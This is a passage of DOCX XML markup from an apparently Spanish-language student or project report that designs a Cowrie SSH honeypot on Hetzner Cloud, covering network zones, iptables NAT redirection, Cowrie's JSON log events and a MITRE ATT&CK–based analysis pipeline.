              <w:t xml:space="preserve">El administrador ejecuta un ataque de fuerza bruta controlado desde Kali Linux para verificar el correcto funcionamiento del honeypot y la generación de logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie operativo. Kali Linux con herramientas hydra y nmap disponibles. Conectividad SSH al servidor cloud.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Postcondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Los logs reflejan los intentos de fuerza bruta y los comandos ejecutados durante la prueba controlada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos de entrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Diccionario de credenciales (hydra), comandos de prueba manuales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos de salida</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Eventos JSON en cowrie.json correspondientes a la sesión de prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseños</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de Arquitectura de Red</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La Figura 1 (incluida en la sección de Descripción) muestra la arquitectura completa del sistema. A continuación se detalla el diseño de red a nivel lógico, incluyendo las tres zonas de seguridad, las interfaces de red y las reglas de filtrado que rigen el tráfico entre ellas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zona Internet (no confiable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta zona incluye todo el tráfico procedente de Internet. Se subdivide en dos tipos de actores:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Atacantes (tráfico hostil): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bots y botnets que escanean rangos de IPs en busca del puerto 22 abierto. Su tráfico se redirige al honeypot Cowrie mediante iptables NAT. Nunca tienen acceso al SSH real ni a otros servicios del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrador (tráfico legítimo): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">acceso SSH al puerto 2022 con autenticación por clave ed25519. Este es el único camino de administración real del servidor. El acceso se restringe por clave pública; la autenticación por contraseña está deshabilitada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux (pruebas controladas): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">accede al puerto 22 para verificar que Cowrie responde correctamente y que los logs se generan según lo esperado. Su tráfico es indistinguible del de un atacante real desde la perspectiva del honeypot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zona DMZ Cloud (Hetzner Cloud)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor cloud actúa como una DMZ funcional que aísla el honeypot del tráfico legítimo. La separación se consigue mediante la combinación de tres mecanismos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Firewall de Hetzner: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">reglas de firewall a nivel de la infraestructura cloud que permiten únicamente el tráfico entrante TCP a los puertos 22 y 2022 e ICMP. Todo el demás tráfico se descarta antes de llegar al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables (firewall del host): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">segunda capa de filtrado en el sistema operativo que rechaza todo lo no autorizado, proporcionando defensa en profundidad. En caso de error en el Cloud Firewall, iptables actúa como respaldo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables NAT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">regla PREROUTING que redirige el tráfico destinado al puerto 22 hacia el puerto 2222 (Cowrie), asegurando que ningún atacante interactúe con el SSH real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zona Laboratorio Local (confiable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El laboratorio local es una red aislada compuesta por máquinas virtuales VirtualBox. No está expuesta a Internet; la comunicación con el servidor cloud se establece bajo demanda mediante SSH para la descarga de logs. Este aislamiento garantiza que el análisis de datos potencialmente maliciosos (logs con URLs de malware, hashes de ficheros descargados) se realiza en un entorno seguro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseño del Flujo de Datos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema procesa los datos en tres etapas claramente diferenciadas, cada una con su propio formato de entrada y salida:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Etapa 1: Captura (Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie registra cada evento como un objeto JSON independiente en el fichero cowrie.json. Los tipos de evento principales son:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cowrie.session.connect: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nueva conexión SSH. Campos: timestamp, src_ip, src_port, dst_ip, dst_port, session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cowrie.login.failed / cowrie.login.success: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">intento de autenticación. Campos: username, password, session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cowrie.command.input: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando ejecutado por el atacante. Campos: input, session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cowrie.session.file_download: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">descarga de fichero. Campos: url, shasum, outfile, session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cowrie.session.closed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fin de sesión. Campos: duration, session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Etapa 2: Análisis (cowrie_analyzer.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script Python procesa el fichero JSON línea a línea, contabilizando las métricas clave con la biblioteca collections.Counter. Para cada IP atacante, realiza una consulta a la API de ip-api.com para obtener país, ciudad e ISP. Las métricas se exportan como gráficas PNG mediante matplotlib y como un informe de resumen en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Etapa 3: Inteligencia (Informe CTI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los hallazgos del análisis se mapean al marco MITRE ATT&amp;CK, asignando a cada comportamiento observado su técnica correspondiente. El informe final incluye la evidencia del log (evento concreto), la técnica MITRE (ID y nombre) y una recomendación defensiva. Este formato permite que un equipo de seguridad comprenda rápidamente qué se observó, qué significa y cómo protegerse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseño de Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El proyecto no dispone de una interfaz gráfica de usuario propia, al tratarse de un sistema basado en línea de comandos y ficheros de datos. Las interfaces relevantes son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interfaz CLI del Script de Análisis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
